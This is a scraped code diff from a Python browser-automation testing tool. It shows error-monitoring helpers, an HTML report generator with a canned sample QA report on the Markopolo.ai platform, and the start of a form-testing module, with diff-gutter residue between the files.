            raw_ts = error.get('timestamp') or datetime.now().isoformat()
            try:
                parsed_ts = datetime.fromisoformat(raw_ts.replace('Z', '+00:00'))
            except ValueError:
                parsed_ts = datetime.now()

            error_infos.append(ErrorInfo(
                error_type=error.get('type', 'unknown'),
                error_message=error.get('message', 'Unknown error'),
                # The JS side may report stack as null; coerce to ''.
                error_stack=error.get('stack') or '',
                timestamp=parsed_ts,
                url=error.get('url', ''),
                source='injected_script',
                severity=self._determine_severity(error.get('type', 'unknown')),
                context={'injected_error': error}
            ))

        return error_infos

    except Exception as e:
        logger.error(f"Error getting injected errors: {e}")
        return []
|
| 551 |
+
|
| 552 |
+
def _determine_severity(self, error_type: str) -> str:
    """Map an error type to its severity bucket ('low', 'medium', or 'high').

    Unknown types default to 'medium'.
    """
    high_types = {
        'javascript_error',
        'unhandled_promise_rejection',
        'network_error',
        'network_failure',
    }
    low_types = {'console_warning', 'performance_issue'}

    if error_type in high_types:
        return 'high'
    if error_type in low_types:
        return 'low'
    # console_error, resource_error, fetch_error, xhr_error and anything
    # unrecognized all fall through to medium.
    return 'medium'
|
| 567 |
+
|
| 568 |
+
def get_all_errors(self) -> "List[ErrorInfo]":
    """Return every error recorded so far (the live list, not a copy)."""
    return self.errors
|
| 571 |
+
|
| 572 |
+
def get_errors_by_type(self, error_type: str) -> "List[ErrorInfo]":
    """Return only the recorded errors whose `error_type` equals *error_type*."""
    matching = []
    for err in self.errors:
        if err.error_type == error_type:
            matching.append(err)
    return matching
|
| 575 |
+
|
| 576 |
+
def get_errors_by_severity(self, severity: str) -> "List[ErrorInfo]":
    """Return only the recorded errors whose `severity` equals *severity*."""
    return list(filter(lambda err: err.severity == severity, self.errors))
|
| 579 |
+
|
| 580 |
+
def get_error_summary(self) -> "Dict[str, Any]":
    """Summarize collected errors.

    Returns a dict with the overall total, per-type and per-severity
    counts, plus the size of each category bucket.
    """
    by_type: dict = {}
    by_severity: dict = {}
    for err in self.errors:
        by_type[err.error_type] = by_type.get(err.error_type, 0) + 1
        by_severity[err.severity] = by_severity.get(err.severity, 0) + 1

    return {
        'total_errors': len(self.errors),
        'errors_by_type': by_type,
        'errors_by_severity': by_severity,
        'console_errors': len(self.console_errors),
        'js_errors': len(self.js_errors),
        'network_errors': len(self.network_errors),
        'dom_errors': len(self.dom_errors),
        'performance_issues': len(self.performance_issues),
    }
|
| 603 |
+
|
| 604 |
+
def clear_errors(self) -> None:
    """Reset every error bucket (aggregate and per-category) to empty."""
    buckets = (
        self.errors,
        self.console_errors,
        self.js_errors,
        self.network_errors,
        self.dom_errors,
        self.performance_issues,
    )
    for bucket in buckets:
        bucket.clear()
|
| 612 |
+
|
| 613 |
+
|
| 614 |
+
# Global error monitor instance
# Module-level shared ErrorMonitor: all handlers and reports in this module
# funnel into this single collector.
error_monitor = ErrorMonitor()
|
src/utils/html_report_generator.py
ADDED
|
@@ -0,0 +1,212 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
HTML Report Generator with modern, colorful UI
|
| 3 |
+
"""
|
| 4 |
+
|
| 5 |
+
import os
|
| 6 |
+
from datetime import datetime
|
| 7 |
+
from typing import Optional
|
| 8 |
+
|
| 9 |
+
|
| 10 |
+
def _base_html(title: str, body_html: str) -> str:
    """Wrap *body_html* in the standard dark-themed report page shell.

    Args:
        title: Page title, rendered in <title> and the page header.
        body_html: Pre-rendered HTML fragments placed inside the grid.

    Returns:
        A complete standalone HTML document as a string; the generation
        timestamp is embedded at render time.
    """
    # Doubled braces ({{ }}) are literal CSS braces inside this f-string.
    return f"""
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>{title}</title>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;600;700&display=swap" rel="stylesheet">
<style>
:root {{
  --bg: #0f172a;
  --card: #111827;
  --text: #e5e7eb;
  --muted: #94a3b8;
  --primary: #06b6d4;
  --primary-2: #3b82f6;
  --ok: #22c55e;
  --warn: #f59e0b;
  --crit: #ef4444;
}}
* {{ box-sizing: border-box; }}
body {{ margin: 0; font-family: Inter, system-ui, -apple-system, Segoe UI, Roboto, Arial; background: linear-gradient(180deg, #0b1022, #0f172a); color: var(--text); }}
.container {{ max-width: 1080px; margin: 32px auto; padding: 0 16px; }}
.header {{ background: radial-gradient(1200px 400px at 20% -10%, rgba(59,130,246,.25), transparent), radial-gradient(900px 400px at 80% 0%, rgba(6,182,212,.25), transparent); border-radius: 16px; padding: 24px; border: 1px solid rgba(255,255,255,.06); }}
h1 {{ margin: 0 0 8px; font-size: 28px; font-weight: 700; letter-spacing: .3px; }}
.meta {{ color: var(--muted); font-size: 13px; }}
.grid {{ display: grid; gap: 16px; grid-template-columns: repeat(12, 1fr); margin-top: 24px; }}
.card {{ grid-column: span 12; background: linear-gradient(180deg, #0f172a, #0b1324); border: 1px solid rgba(255,255,255,.06); border-radius: 14px; padding: 18px; }}
@media (min-width: 900px) {{ .span-6 {{ grid-column: span 6; }} }}
h2 {{ margin: 0 0 12px; font-size: 20px; font-weight: 700; color: #ffffff; }}
h3 {{ margin: 16px 0 8px; font-size: 16px; font-weight: 700; color: #ffffff; }}
p {{ color: var(--text); line-height: 1.6; margin: 8px 0; }}
.status {{ display: inline-block; padding: 2px 8px; border-radius: 999px; font-size: 12px; font-weight: 600; margin-left: 8px; }}
.ok {{ background: rgba(34,197,94,.12); color: var(--ok); border: 1px solid rgba(34,197,94,.3); }}
.warn {{ background: rgba(245,158,11,.12); color: var(--warn); border: 1px solid rgba(245,158,11,.3); }}
.crit {{ background: rgba(239,68,68,.12); color: var(--crit); border: 1px solid rgba(239,68,68,.3); }}
ul {{ margin: 8px 0 8px 20px; color: var(--text); }}
li {{ margin: 6px 0; }}
.pill {{ display:inline-block; padding: 2px 10px; margin: 2px 6px 2px 0; border-radius: 999px; background: rgba(255,255,255,.06); color: var(--muted); font-size: 12px; }}
.footer {{ margin-top: 24px; color: var(--muted); font-size: 12px; text-align: center; }}
a {{ color: var(--primary-2); text-decoration: none; }}
a:hover {{ text-decoration: underline; }}
</style>
</head>
<body>
<div class="container">
<div class="header">
<h1>{title}</h1>
<div class="meta">Generated at {datetime.now().isoformat()}</div>
</div>
<div class="grid">
{body_html}
</div>
<div class="footer">Fagun AI Testing Agent • Modern HTML Report</div>
</div>
</body>
</html>
"""
|
| 71 |
+
|
| 72 |
+
|
| 73 |
+
def generate_html_report_file(title: str, body_html: str, output_dir: str = "reports", filename: Optional[str] = None) -> str:
    """Render a report page and write it to disk.

    Args:
        title: Report title passed through to the HTML shell.
        body_html: Pre-rendered HTML body fragments.
        output_dir: Directory to write into (created if missing).
        filename: Output file name; a timestamped default is used when
            not provided.

    Returns:
        The path of the written HTML file.
    """
    os.makedirs(output_dir, exist_ok=True)
    name = filename or f"report_{datetime.now().strftime('%Y%m%d_%H%M%S')}.html"
    destination = os.path.join(output_dir, name)
    rendered = _base_html(title, body_html)
    with open(destination, "w", encoding="utf-8") as handle:
        handle.write(rendered)
    return destination
|
| 82 |
+
|
| 83 |
+
|
| 84 |
+
def generate_markopolo_sample_report() -> str:
    """Build and write the canned Markopolo.ai sample report.

    The section content is hard-coded HTML (a demo fixture, not live test
    output). Returns the path of the generated file under ``reports/``.
    """
    title = "Comprehensive Testing Report for Markopolo.ai Platform"
    # Body authored as HTML blocks for fidelity
    sections = [
        (
            "Executive Summary",
            """
<p>I have conducted a comprehensive test of the Markopolo.ai platform, focusing on the onboarding process, data connections, integrations, and core modules. The testing revealed several critical issues that prevent full platform functionality, particularly with Shopify integration and data connectivity.</p>
""",
        ),
        (
            "Test Results by Module",
            """
<div class="card"><h3>1. Onboarding Process <span class="status warn">Partially Successful</span></h3>
<ul>
<li>✅ Successfully logged into the platform</li>
<li>✅ Initial onboarding screen accessed</li>
<li>❌ Onboarding process appeared to be skipped or completed automatically</li>
<li>❌ No guided onboarding flow was experienced</li>
</ul>
</div>

<div class="card"><h3>2. Dataroom & Data Container <span class="status warn">Mixed Results</span></h3>
<h4>Client-side MarkTag</h4>
<ul>
<li>✅ Successfully connected and active</li>
<li>✅ Basic setup completed without issues</li>
</ul>
<h4>Server-side MarkTag</h4>
<ul>
<li>❌ <b>Critical Failure</b>: DNS verification failed repeatedly</li>
<li>❌ Unable to verify DNS records (CNAME and TXT records)</li>
<li>❌ System consistently showed "Records failed to verify"</li>
<li><b>Impact</b>: Server-side tracking capabilities unavailable</li>
</ul>
</div>

<div class="card"><h3>3. Integrations <span class="status warn">Mixed Results</span></h3>
<h4>Email Services</h4>
<ul>
<li>✅ <b>SendGrid</b>: Successfully connected using provided API key</li>
<li>✅ <b>Resend</b>: Already connected and functional</li>
<li>❌ <b>Twilio</b>: Failed to validate credentials despite multiple attempts<br/>Error: "Failed to save information!"</li>
</ul>
<h4>WhatsApp Integration</h4>
<ul>
<li>❌ <b>Critical Failure</b>: Unable to connect (dependent on Twilio)</li>
</ul>
<h4>CRM Integrations</h4>
<ul>
<li>✅ <b>HubSpot</b>: Connected</li>
<li>✅ <b>Pipedrive</b>: Connected</li>
<li>❌ <b>Salesforce</b>: Connection failed - no credentials</li>
<li>❌ <b>Zoho CRM</b>: Connection failed - no credentials</li>
</ul>
</div>

<div class="card"><h3>4. Shopify Integration <span class="status crit">Critical Failure</span></h3>
<ul>
<li>✅ Accessed Shopify connection interface</li>
<li>✅ Entered test store URL: <code>testshop.myshopify.com</code></li>
<li>✅ Navigated to Shopify login page</li>
<li>❌ Unauthorized Access Error upon login attempt</li>
</ul>
<p><b>Impact</b>: Unable to test Shopify-specific flows (campaigns, discounts, event tracking).</p>
</div>

<div class="card"><h3>5. Users Module <span class="status warn">Partially Tested</span></h3>
<ul>
<li>✅ Accessed Users interface</li>
<li>✅ Download template works</li>
<li>❌ Unable to upload leads: File upload requires pre-defined file paths</li>
</ul>
</div>

<div class="card"><h3>6. Audience Studio <span class="status warn">Functional but Limited</span></h3>
<ul>
<li>✅ Interface accessible</li>
<li>❌ AI query failure prevented audience creation</li>
</ul>
</div>

<div class="card"><h3>7. Analytics Module <span class="status warn">Limited Functionality</span></h3>
<ul>
<li>✅ Interface accessible</li>
<li>❌ No data available; tracking not validated</li>
</ul>
</div>

<div class="card"><h3>8. Knowledge Base <span class="status warn">Not Tested</span></h3>
<ul><li>❌ Not located during testing</li></ul>
</div>
""",
        ),
        (
            "Critical Issues Identified",
            """
<ul>
<li><b>Shopify Integration</b> – <span class="status crit">Critical</span>: Unauthorized access blocking store connection</li>
<li><b>Server-side MarkTag DNS</b> – <span class="status warn">High</span>: DNS verification failing</li>
<li><b>Twilio Integration</b> – <span class="status warn">High</span>: Credential validation failing</li>
<li><b>Data Connectivity</b> – <span class="status warn">Medium</span>: Multiple integration failures</li>
</ul>
""",
        ),
        (
            "Recommendations",
            """
<ol>
<li><b>Priority 1</b>: Resolve Shopify authentication issues</li>
<li><b>Priority 1</b>: Fix Twilio credential validation</li>
<li><b>Priority 2</b>: Address server-side MarkTag DNS verification</li>
<li><b>Priority 2</b>: Improve error messaging and user guidance</li>
<li><b>Priority 3</b>: Validate file upload flow with proper file handling</li>
</ol>
""",
        ),
        (
            "Conclusion",
            """
<p><b>Overall Platform Readiness</b>: <span class="status warn">Limited</span> – key flows blocked by integration failures. Retest end-to-end journey after addressing blockers, especially Shopify.</p>
""",
        ),
    ]

    # Each (heading, content) pair becomes one card in the report grid.
    body = "".join([f'<div class="card"><h2>{h}</h2>{c}</div>' for h, c in sections])
    return generate_html_report_file(title, body, output_dir="reports", filename=f"markopolo_report_{datetime.now().strftime('%Y%m%d_%H%M%S')}.html")
|
| 211 |
+
|
| 212 |
+
|
src/utils/intelligent_form_testing.py
ADDED
|
@@ -0,0 +1,1096 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Intelligent Form Testing
|
| 3 |
+
====================================================================
|
| 4 |
+
|
| 5 |
+
Advanced AI-powered form testing with comprehensive scenario coverage.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import asyncio
|
| 13 |
+
import logging
|
| 14 |
+
import random
|
| 15 |
+
import string
|
| 16 |
+
from typing import Dict, List, Optional, Tuple, Any
|
| 17 |
+
from dataclasses import dataclass
|
| 18 |
+
from datetime import datetime
|
| 19 |
+
import json
|
| 20 |
+
|
| 21 |
+
from playwright.async_api import Page, Locator, Error as PlaywrightError
|
| 22 |
+
from langchain_core.language_models.chat_models import BaseChatModel
|
| 23 |
+
|
| 24 |
+
from src.utils.advanced_error_handler import AdvancedErrorHandler, DetailedError
|
| 25 |
+
|
| 26 |
+
logger = logging.getLogger(__name__)
|
| 27 |
+
|
| 28 |
+
@dataclass
class FormField:
    """Represents a form field with its properties and testing data.

    Attribute values mirror the DOM attributes read during discovery;
    length limits are parsed from ``minlength``/``maxlength`` when present.
    """
    element: Locator  # Playwright handle used to interact with the field
    field_type: str  # e.g. "text", "email", "password", "textarea", "select"
    name: str  # value of the name attribute ("" when absent)
    placeholder: str  # placeholder / aria-label text ("" when absent)
    required: bool  # True when the required attribute is present
    validation_pattern: Optional[str] = None  # HTML "pattern" attribute, if any
    min_length: Optional[int] = None  # parsed minlength, if declared
    max_length: Optional[int] = None  # parsed maxlength, if declared
    # BUGFIX (typing): default is None, so the annotation must be Optional;
    # the old "List[str] = None" contradicted itself. None means "not a
    # select-like field"; discovery code passes a list only when options exist.
    options: Optional[List[str]] = None
|
| 40 |
+
|
| 41 |
+
@dataclass
class TestScenario:
    """Represents a test scenario with input data and expected behavior."""
    # Human-readable scenario identifier, e.g. "Valid Email - username".
    name: str
    # Mapping of form-field name -> value to enter for this scenario.
    data: Dict[str, Any]
    # Expected outcome keyword used by the executor: e.g. "success",
    # "validation_error", "required_error", "security_error",
    # "authentication_error".
    expected_result: str
    # Short description of what the scenario exercises.
